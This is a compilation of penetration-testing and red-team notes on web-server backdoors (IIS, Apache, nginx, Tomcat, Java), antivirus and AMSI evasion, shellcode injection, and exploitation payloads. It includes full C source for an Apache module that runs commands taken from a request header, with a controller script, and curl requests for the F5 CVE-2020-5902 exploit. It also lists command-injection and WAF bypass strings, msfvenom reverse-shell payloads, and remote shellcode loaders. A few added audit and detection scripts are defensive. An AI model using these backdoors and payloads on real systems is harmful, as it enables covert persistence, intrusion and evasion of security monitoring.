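# Real PageHandlerFactory-ISAPI-* entries are native (modules="IsapiModule",
# no managed type), so a managed `type` under that name is suspicious.
NATIVE_HANDLER_PREFIXES = ("PageHandlerFactory-ISAPI-",)
FRAMEWORK_TYPE_PREFIXES = ("System.", "Microsoft.")
EXPECTED_MANAGED_EXTENSIONS = {"*.aspx", "*.ashx", "*.asmx", "*.axd", "*.svc"}

# constructed sample combining the registrations quoted in the notes
SAMPLE_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <modules>
      <add name="UrlRoutingModule" type="UrlRoutingModule.IISModule" />
    </modules>
    <handlers>
      <add name="PageHandlerFactory-ISAPI-2.0-32" path="*.xxx" verb="*" type="IsapiModules.Handler" resourceType="Unspecified" requireAccess="script" preCondition="integratedMode" />
      <add name="PageHandlerFactory-ISAPI-2.0-32-1" path="*.iis" verb="*" type="IsapiModule.Handler" preCondition="integratedMode" />
    </handlers>
  </system.webServer>
</configuration>
"""


def audit_web_config(xml_text):
    """Return (section, name, [reasons]) for every suspicious <add> entry."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    findings = []
    for section in ("modules", "handlers"):
        for container in root.iter(section):
            for entry in container.findall("add"):
                name = entry.get("name", "")
                typ = entry.get("type", "")
                path = entry.get("path", "")
                reasons = []
                if section == "modules" and name in KNOWN_MODULE_TYPES \
                        and typ != KNOWN_MODULE_TYPES[name]:
                    reasons.append("built-in module name bound to foreign type " + typ)
                if section == "handlers" and name.startswith(NATIVE_HANDLER_PREFIXES) and typ:
                    reasons.append("native handler name bound to managed type " + typ)
                if section == "handlers" and typ and path not in EXPECTED_MANAGED_EXTENSIONS:
                    reasons.append("managed handler mapped to unusual path " + path)
                if typ and not typ.startswith(FRAMEWORK_TYPE_PREFIXES):
                    reasons.append("type outside framework namespaces; inspect the assembly in bin")
                if reasons:
                    findings.append((section, name, reasons))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WEB_CONFIG
    for section, name, reasons in audit_web_config(text):
        print("%s/%s: %s" % (section, name, "; ".join(reasons)))
```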


          IIS_RAID

From: https://github.com/0x09AL/IIS-Raid
Build under VS2019. In Functions.h change the connection password; passfile is where the dumped credentials are saved and com_header is the request header the backdoor and the controller use to communicate.
Open the project, set your password and press Ctrl+B to build the solution (a Release build here). Upload the DLL to the server, rename it and install it as a module:
> C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:IsapiDotNet /image:"c:\windows\system32\inetsrv\IsapiDotNet.dll" /add:true
It now shows up under Modules.
Remote connection
> python3 iis_controller.py --url http://192.168.0.98 --password thisismykey
Commands are run as
> cmd <command>
The dump command dumps the login credentials of the IIS site to the configured location. inject runs shellcode: generate raw-format shellcode with CS or msf and run
> inject <path>

          JAVA Web Backdoor

From: https://www.freebuf.com/articles/web/172753.html
https://github.com/rebeyond/memShell
Once you hold a webshell or a bash shell, download the backdoor and run it: it injects into the process and becomes a fileless, self-reviving backdoor. Download and unpack it into any web directory.
You get two jar files; run the injector with password set to your own password:
> java -jar inject.jar password
After a successful injection, commands can be run from any URL of any page of the web app:
http://192.168.0.121:8080/css/app.css?pass_the_world=password
It supports running commands, reverse shells, file upload/download, directory listing, file reading, adding a proxy and connecting with Caidao.

          Tomcat JSP HideShell

From: https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoA
https://github.com/QAX-A-Team/HideShell
Upload your own shell and hideshell to the target machine. Request your own shell first so that Tomcat compiles it and creates a JspServletWrapper that is kept in the JspRuntimeContext.
Then open hideshell.jsp and click hide on your shell.
It is now hidden


Open hideshell.jsp again to see the file name of the hidden shell.
Request it to check
hideshell itself can be hidden too, in which case it is reached as hidden-hideshell.jsp
The directory is now empty
Requests to a shell hidden this way produce no log entries
What if the shelltest folder is deleted, does access survive?
It does

Apache Module Backdoor 1

From: https://github.com/WangYihang/Apache-HTTP-Server-Module-Backdoor
Generate the module skeleton
> apxs -g -n auth
Edit mod_auth.c
#include "httpd.h"
#include "http_config.h"
#include "http_protocol.h"
#include "ap_config.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcmp */

static int auth_handler(request_rec *r)
{
    const apr_array_header_t *fields;
    int i;
    apr_table_entry_t *e = 0;
    char FLAG = 0;

    /* walk the request headers looking for the trigger header */
    fields = apr_table_elts(r->headers_in);
    e = (apr_table_entry_t *) fields->elts;
    for (i = 0; i < fields->nelts; i++) {
        if (strcmp(e[i].key, "Authorizations") == 0) {
            FLAG = 1;
            break;
        }
    }
    if (FLAG) {
        char *command = e[i].val;
        FILE *fp = popen(command, "r");
        char buffer[0x100] = {0};
        int counter = 1;
        while (counter) {
            counter = fread(buffer, 1, sizeof(buffer), fp);
            ap_rwrite(buffer, counter, r);
        }
        pclose(fp);
        return DONE;
    }
    return DECLINED;
}

static void auth_register_hooks(apr_pool_t *p)
{
    ap_hook_handler(auth_handler, NULL, NULL, APR_HOOK_MIDDLE);
}

module AP_MODULE_DECLARE_DATA auth_module = {
    STANDARD20_MODULE_STUFF,
    NULL,                  /* create per-dir    config structures */
    NULL,                  /* merge  per-dir    config structures */
    NULL,                  /* create per-server config structures */
    NULL,                  /* merge  per-server config structures */
    NULL,                  /* table of config file commands       */
    auth_register_hooks    /* register hooks                      */
};
Compile, then restart apache
> apxs -i -a -c mod_auth.c && service apache2 restart
The original accepts the header backdoor, which is too obvious; it was changed to Authorizations here.
Or drive it from python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import sys


def exploit(host, port, command):
    headers = {
        "Authorizations": command
    }
    url = "http://%s:%d/" % (host, port)
    response = requests.get(url, headers=headers)
    content = response.content
    print content


def main():
    if len(sys.argv) != 3:
        print "Usage : "
        print "\tpython %s [HOST] [PORT]" % (sys.argv[0])
        exit(1)
    host = sys.argv[1]
    port = int(sys.argv[2])
    while True:
        command = raw_input("$ ")
        if command == "exit":
            break
        exploit(host, port, command)


if __name__ == "__main__":
    main()

Apache Module Backdoor 2

From: https://github.com/VladRico/apache2_BackdoorMod
Copy the .load file into /etc/apache2/mods-available/ and the .so file into /usr/lib/apache2/modules/, enable the backdoor module and restart apache
> a2enmod backdoor && service apache2 restart
Add the field password=backdoor to the Cookie and request http://ip/ping; a reply like the one shown means the backdoor is running.
Request http://ip/bind/12345 to open a bind connection, then run nc ip 12345 on the attacking machine
Request http://ip/revtty/192.168.0.107/12138 to open a reverse connection; attacking machine 109 listens on 12138 with nc
Request http://ip/proxy/1337 to start a socks proxy



To stop the socks proxy run
> echo "imdonewithyou" | nc 192.168.0.111 1337
That ends the socks proxy. The original author's file name backdoor is too obvious; edit the files and rebuild, e.g. generate the skeleton under the name phpmodev


and change the cookie field to something misleading such as Authorizations=PHPSESSIONID

Apache Module Backdoor 3

From: https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247491179&idx=1&sn=ab26fe36ac74f5b140e91279ae8018c7
Generate the module skeleton
> apxs -g -n phpdevmod
Edit mod_phpdevmod.c and build
> make -e CC=x86_64-linux-gnu-g++
The generated .so lands in the ./.libs/ directory
Copy it to /usr/lib/apache2/modules/ and add the following to /etc/apache2/mods-enabled/php7.0.load:
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
<Location /qq.jpg>
    # can be any file that does not exist
    SetHandler phpdevmod
</Location>
Restart apache. The backdoor is reached as http://ip/qq.jpg?<encoded command>. Requesting the backdoor file directly:
636174202F6574632F706173737764 is cat /etc/passwd with each byte hex-encoded
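All three Apache variants above leave traces in configuration: an extra LoadModule (variants 2 and 3) and, in variant 3, a SetHandler bound to a single phantom path; variant 1's header trigger only shows in traffic. The audit below is an added example and not part of any of the three projects; its sets of known module and handler names are assumptions, and on Debian the module set should come from `dpkg -L apache2-bin` plus the packages you installed.

```python
"""Audit Apache config fragments for unexpected LoadModule lines and
SetHandler directives tied to a single file-like Location (added example)."""
import os
import re
import sys

LOADMODULE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.I)
LOCATION_OPEN = re.compile(r"^\s*<Location\s+([^>\s]+)\s*>", re.I)
LOCATION_CLOSE = re.compile(r"^\s*</Location>", re.I)
SETHANDLER = re.compile(r"^\s*SetHandler\s+(\S+)", re.I)

# constructed sample reproducing the third variant next to a legitimate block
SAMPLE_CONF = """\
LoadModule php7_module /usr/lib/apache2/modules/libphp7.0.so
LoadModule phpdevmod_module /usr/lib/apache2/modules/mod_phpdevmod.so
<Location /qq.jpg>
    SetHandler phpdevmod
</Location>
<Location /status>
    SetHandler server-status
</Location>
"""
# assumption: module and handler names a clean install of this server ships
KNOWN_MODULES = {"php7_module", "status_module", "rewrite_module", "proxy_module"}
KNOWN_HANDLERS = {"server-status", "server-info", "cgi-script", "application/x-httpd-php"}


def audit_apache_conf(text, known_modules=KNOWN_MODULES, known_handlers=KNOWN_HANDLERS):
    """Return (line_no, reason) pairs for lines that need a second look."""
    findings = []
    location = None  # the <Location> block we are currently inside, if any
    for no, line in enumerate(text.splitlines(), 1):
        m = LOADMODULE.match(line)
        if m:
            name, path = m.groups()
            if name not in known_modules:
                findings.append((no, "LoadModule %s from %s is not in the known module set" % (name, path)))
            continue
        m = LOCATION_OPEN.match(line)
        if m:
            location = m.group(1)
            continue
        if LOCATION_CLOSE.match(line):
            location = None
            continue
        m = SETHANDLER.match(line)
        if m and m.group(1) not in known_handlers:
            where = "inside <Location %s>" % location if location else "at top level"
            reason = "SetHandler %s %s names an unknown handler" % (m.group(1), where)
            # a handler bound to one file-like path is the trigger shape used above
            if location is not None and os.path.splitext(location)[1]:
                reason += "; the location looks like a single file, a typical trigger path"
            findings.append((no, reason))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONF
    for no, why in audit_apache_conf(text):
        print("line %d: %s" % (no, why))
```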

Nginx Lua Backdoor

From: https://github.com/netxfly/nginx_lua_security
https://github.com/Y4er/Y4er.com/blob/251d88d8a3cf21e9bafe15c43d7900ffeacfa7ea/content/post/nginx-lua-backdoor.md
Prerequisites: root access, and an nginx built with the lua module. In the http block of nginx.conf, add the lua script path and the script nginx loads at startup.
Create Init.lua in the lua directory /waf/ with the content below; require nginx loads the module from nginx.lua.
Create nginx.lua in /waf/ to implement command execution; the parameter is waf.
Add the location to the nginx config file.
Result:

          PwnNginx

From: https://github.com/t57root/pwnginx
Unpack it and build the client
> make
Edit the nginx source file /src/core/nginx.c: find configure arguments: and append --prefix=/usr/local/nginx\n, which is the nginx install directory
Rebuild nginx with the backdoor module added
> ./configure --prefix=/usr/local/nginx/ --add-module=/tmp/pwnginx-master/module
          >make
Overwrite the original nginx binary with the new one
> cp -f objs/nginx /usr/local/nginx/sbin/nginx
Restart nginx
> killall nginx && /usr/local/nginx/sbin/nginx
Connect
> ./pwnginx shell <target> <nginx port> <password>
The default password is t57root; it is set in pwnginx-master\module\config.h and can be changed before nginx is recompiled.


This backdoor can also open a socks tunnel

Pentest and red team tips

Breaking the parent process chain

explorer.exe /root,<bin> behaves like cmd.exe /c <bin>, except that going through explorer breaks the process tree: a new explorer.exe instance is created and the program becomes a child of that new instance.


IoT high-frequency usernames and passwords

          Bypass mod_security

XSS and injection bypasses for mod_security
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --
<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5--
%75%6e%69on = union
%73%65%6cect = select
%75%6e%69 = uni, URL-encoded
%73%65%6c = sel, URL-encoded
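The payloads above work because the rule engine matches before it has undone the encodings: percent-encoded keyword fragments, MySQL `/*!50000 */` version comments and JavaScript `\uXXXX` escapes. The normaliser below is an added example (not from the notes) showing the decoding a rule must do first; the two signatures are deliberately minimal and the three-round decode limit is an assumption.

```python
"""Normalise a request value before signature matching so the encodings
shown above collapse back to the keyword they hide (added example)."""
import re
from urllib.parse import unquote_plus

VERSION_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)   # /*!50000union*/ -> union
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)               # MySQL treats /**/ as whitespace
JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")              # pr\u006fmpt -> prompt
WHITESPACE = re.compile(r"\s+")

SQLI_UNION = re.compile(r"\bunion\b(\s+all)?\s+select\b")
XSS_EVENT_HANDLER = re.compile(r"<\w+[^>]*\son\w+\s*=", re.S)

# the two payloads quoted in the notes, kept as test input
PAYLOAD_SQLI = "/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4"
PAYLOAD_XSS = r"<marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>"


def normalize(value, max_rounds=3):
    """Percent-decode to a fixpoint (double encoding), decode JS escapes,
    unwrap version comments, replace other comments by a space, fold case."""
    s = value
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s)
    s = VERSION_COMMENT.sub(r"\1", s)
    s = PLAIN_COMMENT.sub(" ", s)
    return WHITESPACE.sub(" ", s).strip().lower()


def classify(value):
    """Return the names of the signatures that fire on the normalised value."""
    n = normalize(value)
    hits = []
    if SQLI_UNION.search(n):
        hits.append("sqli-union-select")
    if XSS_EVENT_HANDLER.search(n):
        hits.append("xss-event-handler")
    return hits


if __name__ == "__main__":
    for p in (PAYLOAD_SQLI, PAYLOAD_XSS, "union%2520select", "plain search text"):
        print(repr(p), "->", repr(normalize(p)), classify(p))
```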

Wordlist for finding git and svn

Top 25 redirect dorks

Using grep to quickly strip junk

curl http://host.xx/file.js | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"


Wordlist compiled from leaked passwords

https://github.com/FlameOfIgnis/Pwdb-Public
Compiled from 1 billion leaked records found online, of which 257,669,588 were filtered out as corrupt data or test accounts. The 1 billion credentials boil down to 168,919,919 passwords and 393,386,953 usernames. The average password length is 9.4822 characters; 12.04% contain special characters, 28.79% are letters only, 26.16% are lowercase only, 13.37% are digits only, and 8.83% of the passwords were seen only once. Compared with rockyou (14,344,391 passwords), this list differs from rockyou by 80%. Smaller per-country lists are also provided.

Command injection bypasses

From: @shreyasrx
cat /etc/passwd
cat /e"t"c/pa"s"swd
cat /'e'tc/pa's'swd
cat /etc/pa??wd
cat /etc/pa*wd
cat /et' 'c/passw' 'd
cat /et$()c/pa$()$swd
cat /et${neko}c/pas${poi}swd
echo "dwssap/cte/ tac" | rev
$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)
w\ho\am\i
/\b\i\n/////s\h
who$@ami
xyz%0Acat%20/etc/passwd
IFS=,;`cat<<<uname,-a`
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
cat /???/?????d
{cat,/etc/passwd}

Checking for Heartbleed

cat list.txt | while read line ; do echo "QUIT" | openssl s_client -connect $line:443 2>&1 | grep 'server extension "heartbeat" (id=15)' || echo $line: safe; done
This only reports whether the server advertises the heartbeat extension; an advertised extension is a candidate for a real Heartbleed test, not proof of the vulnerability.

Remote unzip

pip install remotezip
# list the contents of a remote archive
remotezip -l http://site/bigfile.zip
# extract one file from it
remotezip "http://site/bigfile.zip" "file.txt"

Top 25 SSRF dorks

Querying subdomains with the SecurityTrails API

Get a free API key at https://securitytrails.com/
curl -s --request GET --url https://api.securitytrails.com/v1/domain/target.com/subdomains?apikey=API_KEY | jq '.subdomains[]' | sed 's/\"http://g' >test.txt 2>/dev/null && sed "s/$/.target.com/" test.txt | sed 's/ //g' && rm test.txt

Email address payloads

XSS
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
SSTI
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQL injection
"' OR 1=1 -- '"@example.com
"mail'); --"@example.com
SSRF
john.doe@abc123.dnslog.cn
john.doe@[127.0.0.1]
Header injection
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"recipient@test.com>\r\nRCPT TO:<victim+"@test.com

Web server log analysis commands

https://gist.github.com/hvelarde/ceac345c662429447959625e6feb2b47
Total requests by status code
awk '{print $9}' /var/log/apache2/access.log | sort | uniq -c | sort -rn
Request count by IP, with reverse lookup
awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'
Request count by user agent
awk -F'"' '{print $6}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head
Request count by URL
awk '{print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head
URLs that returned 404, by count
awk '$9 ~ /404/ {print $7}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head
IPs whose requests caused back-end errors
awk '$0 ~ /\[error\]/ && match($0, /(client: )(.*)(, server)/, arr) {print arr[2]}' /var/log/apache2/error.log | sort | uniq -c | sort -rn | awk -v OFS='\t' '{"host " $2 | getline ip; print $0, ip}'
Requests from the last 10 minutes
awk -v date=$(date +[%d/%b/%Y:%H:%M --date="-10 minutes") '$4 > date' /var/log/nginx/access.log
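The same triage as the awk one-liners above, as an added example (not from the gist) that parses the combined log format properly instead of splitting on spaces, so quoted user agents and malformed lines do not skew the counts. The log lines are constructed.

```python
"""Status, client and 404 triage over Apache combined-format log lines
(added example; sample lines are constructed)."""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2020:13:55:37 +0000] "GET /admin HTTP/1.1" 404 210 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2020:13:55:38 +0000] "GET /admin HTTP/1.1" 404 210 "-" "curl/7.68.0"
10.0.0.9 - - [10/Oct/2020:13:55:39 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "curl/7.68.0"
10.0.0.9 - - [10/Oct/2020:13:55:40 +0000] "POST /login HTTP/1.1" 500 0 "-" "curl/7.68.0"
garbage line that does not parse
"""


def parse(lines):
    """Yield one dict per line that matches the combined format; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def count_by(field, lines):
    """awk '{print $N}' | sort | uniq -c | sort -rn, for any parsed field."""
    return Counter(rec[field] for rec in parse(lines)).most_common()


def not_found_urls(lines):
    """awk '$9 ~ /404/ {print $7}': which paths are being probed."""
    return Counter(rec["url"] for rec in parse(lines) if rec["status"] == "404").most_common()


def noisy_clients(lines, min_errors=2):
    """Client IPs with at least min_errors 4xx/5xx responses."""
    errors = Counter(rec["ip"] for rec in parse(lines) if rec["status"][0] in "45")
    return [(ip, n) for ip, n in errors.most_common() if n >= min_errors]


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()  # or open("/var/log/apache2/access.log")
    print("by status:", count_by("status", lines))
    print("by ip:", count_by("ip", lines))
    print("by user agent:", count_by("ua", lines))
    print("404 urls:", not_found_urls(lines))
    print("noisy clients:", noisy_clients(lines))
```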

          Bypass AMSI

$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUt'+'ils')
$h="4456625220575263174452554847"
$s=[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " "
$b=$a.GetField($s,'NonPublic,Static')
$b.SetValue($null,$true)

          Bypass AMSI 2

https://github.com/crawl3r/FunWithAMSI
Compile it and use it directly
[System.Reflection.Assembly]::LoadFile("C:\\Users\\test\\Desktop\\AmsiFun.dll")
[Amsi]::Bypass()



          CVE-2020-5902

F5 BIG-IP TMUI RCE
https://raw.githubusercontent.com/jas502n/CVE-2020-5902/master/CVE-2020-5902.py
RCE
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Read a file
curl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
Run Linux commands
/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
/fileSave.jsp?fileName=/tmp/cmd&content=id
/tmshCmd.jsp?command=list+/tmp/cmd
/tmshCmd.jsp?command=delete+cli+alias+private+list

Some launchers worth trying against application whitelisting

forfiles /p c:\windows\system32 /m notepad.exe /c <bin>
explorer.exe /root,"<bin>"
pcalua.exe -a <bin>
scriptrunner.exe -appvscript <bin>
wmic process call create <bin>
rundll32.exe advpack.dll, RegisterOCX <bin>
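Each launcher above, and the explorer.exe /root, trick from the parent-process tip earlier, has a fixed command-line shape that process-creation telemetry (Sysmon event 1, Windows 4688) can match. The rules below are an added example, not from the notes; the events are constructed dicts with Sysmon-style field names, and the rule names are my own.

```python
"""Process-creation rules for the proxy-execution launchers listed above
(added example; events are constructed in Sysmon Event ID 1 style)."""
import ntpath

# (image basename, predicate on the lower-cased command line padded with spaces, rule name)
RULES = [
    ("forfiles.exe",     lambda cl: " /c " in cl,                                  "forfiles-proxy-exec"),
    ("explorer.exe",     lambda cl: "/root," in cl,                                "explorer-root-launch"),
    ("pcalua.exe",       lambda cl: " -a " in cl,                                  "pcalua-proxy-exec"),
    ("scriptrunner.exe", lambda cl: "-appvscript" in cl,                           "scriptrunner-proxy-exec"),
    ("wmic.exe",         lambda cl: "process" in cl and "call" in cl and "create" in cl, "wmic-process-create"),
    ("rundll32.exe",     lambda cl: "advpack.dll" in cl and "registerocx" in cl,   "rundll32-advpack-registerocx"),
]

SAMPLE_EVENTS = [
    {"ProcessId": 101, "Image": r"C:\Windows\System32\forfiles.exe",
     "CommandLine": r"forfiles /p c:\windows\system32 /m notepad.exe /c c:\users\public\tool.exe"},
    {"ProcessId": 102, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r'explorer.exe /root,"c:\users\public\tool.exe"'},
    {"ProcessId": 103, "Image": r"C:\Windows\System32\pcalua.exe",
     "CommandLine": r"pcalua.exe -a c:\users\public\tool.exe"},
    {"ProcessId": 104, "Image": r"C:\Windows\System32\ScriptRunner.exe",
     "CommandLine": r"scriptrunner.exe -appvscript c:\users\public\tool.exe"},
    {"ProcessId": 105, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic process call create c:\users\public\tool.exe"},
    {"ProcessId": 106, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe advpack.dll, RegisterOCX c:\users\public\tool.exe"},
    # benign-looking controls: ordinary rundll32 use and a normal explorer start
    {"ProcessId": 107, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"ProcessId": 108, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": r"explorer.exe"},
]


def classify(event):
    """Return the name of the first rule matching the event, or None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    cl = " " + event.get("CommandLine", "").lower() + " "
    for exe, predicate, name in RULES:
        if image == exe and predicate(cl):
            return name
    return None


def scan(events):
    """Return (ProcessId, rule) for every event a rule matches."""
    hits = []
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.append((ev["ProcessId"], rule))
    return hits


if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(pid, rule)
```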

Bypassing LSA protection

          https://github.com/RedCursorSecurityConsulting/PPLKiller





PEzor AV evasion

Injects shellcode through inline_syscall, combines it with projects such as sgn and donut, and adds some anti-debugging tricks
https://github.com/phra/PEzor
$ git clone https://github.com/phra/PEzor.git
$ cd PEzor
$ sudo bash install.sh
$ bash PEzor.sh -h
Tested here with mimikatz, with -sleep set to 2 minutes, so it waits two minutes after launch. Before packing:
After packing



Testing Covenant



Dynamic-invoke process injection logic

Further reading:
https://github.com/dtrizna/DInvoke_PoC
https://rastamouse.me/blog/process-injection-dinvoke/
https://thewover.github.io/Dynamic-Invoke/
The test here uses donut's python module and injects into the notepad process.


Bypassing Windows Defender on Windows Server 2016 and 2019

Once you have a webshell, the next step is to get a reverse shell back.
After https://github.com/trustedsec/unicorn failed, an article on injecting shellcode into memory with golang turned up:
https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher-it/
https://github.com/brimstone/go-shellcode
https://golang.org/pkg/syscall/?GOOS=windows#NewLazyDLL
The code uses golang's syscall package and its NewLazyDLL function to load Kernel32.dll; once loaded, it is used for address lookup and memory allocation. The compiled program takes the msfvenom output in hex form as a command-line argument. Because the code has been public for a long time it may be detected when used as-is, so it was modified here: all variables renamed, the shellcode loaded over a URL, and some extra arguments added to get past sandboxes (the program exits when they are absent). Download it to the server with powershell
After a few minutes the file had not been deleted, so it was run again and msf received a session
Running getuid returned an error; checking the directory showed the file had been deleted after all


Reproducing it locally shows that it is detected
For the bypass, see Microsoft's article
https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/configure-server-exclusions-microsoft-defender-antivirus#list-of-automatic-exclusions
On Windows Server 2016 and 2019, Microsoft Defender Antivirus automatically enrols you in certain exclusions, defined by the server roles you specify; see the list of automatic exclusions. Those exclusions are not scanned by Windows Defender.
Following the article, create a directory named PHP5433 and rename the file to php-cgi.exe; that gets past Defender's protection




Privilege escalation with Rotten Potato
Webshell used in the article: https://github.com/NetSPI/cmdsql

Decoding shellcode in memory to bypass AV

https://github.com/mhaskar/Shellcode-In-Memory-Decoder
Flow: open a process and obtain a HANDLE to it; allocate space inside the process (get a memory address); write the data (shellcode) into that process; execute the shellcode. These steps map onto a few Win32 APIs: OpenProcess(), VirtualAllocEx(), WriteProcessMemory(), CreateRemoteThread(). Normally the raw shellcode is written straight into memory, but if the AV/EDR recognises the shellcode it will certainly alert, so the binary stores the shellcode in a reversibly encoded form (add, subtract, XOR, swap) and decodes it before writing it to memory to get around the protection. Generate shellcode with CS
XOR it with python
The script reads each opcode byte of the shellcode, XORs it with the byte 0x01 (the key in this case) and prints the result as shellcode:
Next comes the C code that performs the shellcode injection. Build it with
x86_64-w64-mingw32-gcc decoder.c -o decoder.exe -w
Each win32 API is covered step by step. Opening the process and getting a handle: choose the process to inject into and obtain a handle to it so it can be operated on, using the OpenProcess win32 API
The code takes the target process ID as its first argument, opens it with OpenProcess() using PROCESS_ALL_ACCESS, stores the handle in the variable process and prints it
The handle is retrieved. The next step is to allocate space inside the process with VirtualAllocEx()
base_address holds the address of the allocated memory; line 16 prints it, and the data is then written there
0x29d0000 is the address; attach x64dbg to explorer.exe and look there
VirtualAllocEx has allocated memory inside explorer.exe and the data can be written. Next the shellcode is decoded and written into memory. Even with this kind of encoding (XOR here) the shellcode may still be flagged, so use a stronger encoding and test it before using it in an operation; 0x01 is used here only for the test
This code decodes every byte with the key 0x01 and then writes the shellcode into memory. Run it
Each byte is written to the address; debug with x64dbg and go to 0x3ce0000:
The shellcode is in memory. The last step is to execute it with CreateRemoteThread()



C_Shot remote shellcode loader

From: https://github.com/anthemtotheego/C_Shot
http://blog.redxorblue.com/2020/07/cshot-just-what-doctor-ordered.html
C_Shot is an offensive security tool written in C that downloads a remote shellcode binary (.bin) over HTTP/HTTPS, injects it and executes it: 1. inject the shellcode into its own process; 2. inject the shellcode into a child process using parent-process spoofing. The benefit of a tool like C_Shot is that the malicious code to be run is not stored in the binary but fetched from a remote location, read into memory and executed, which helps tools like C_Shot look fairly benign to AV/EDR and go unnoticed.
cl /D _UNICODE /D UNICODE cshot.c
Generate a staged payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -a x64 --platform windows -b "\x00" -f raw -o /root/Desktop/DefaultStaged.bin
Generate a stageless payload
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -a x64 --platform windows -b "\x00" -f raw -o /root/Desktop/DefaultStageless.bin
With the binaries built, a web server is needed, for example python -m SimpleHTTPServer 80, or host them somewhere external. All examples in the article host the shellcode on github.
Make sure Windows Defender is on.
Injecting into its own process
Testing the staged shellcode: blocked by Windows Defender
The stageless shellcode is not blocked
Shell obtained
Testing the staged shellcode with parent-process spoofing:


Shell obtained
Now against CrowdStrike, injecting into its own process: both kinds of shellcode are blocked


Parent-process spoofing
Shell obtained


Both staged and stageless shellcode bypass the AV when parent-process spoofing is used. The public release of this tool does no API hiding, string obfuscation, memory-protection tricks or similar; without modification, static analysis should catch it easily.

ThinkPHP pentest techniques

thinkphp 3.2.3
where injection: when a string is passed as the where argument, injection is possible
1) and 1=updatexml(1,concat(0x7e,(user()),0x7e),1)--+
exp injection: the parameter must come from the global array (not the I method) for the bug to trigger
public function getuser(){
    $User = D('User');
    $map = array('id' => $_GET['id']);
    $user = $User->where($map)->find();
    dump($user);
}
id[0]=exp&id[1]==1 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))--+
bind injection
public function getuser(){
    $data['id'] = I('id');
    $uname['username'] = I('username');
    $user = M('User')->where($data)->save($uname);
    dump($user);
}
id[0]=bind&id[1]=0 and 1=(updatexml(1,concat(0x7e,(user()),0x7e),1))&username=fanxing
find/select/delete injection
public function getuser(){
    $user = M('User')->find(I('id'));
    dump($user);
}
?id[where]=1 and 1=updatexml(1,concat(0x7e,(user()),0x7e),1)
order by injection
public function user(){
    $data['username'] = array('eq','admin');
    $user = M('User')->where($data)->order(I('order'))->find();
    dump($user);
}
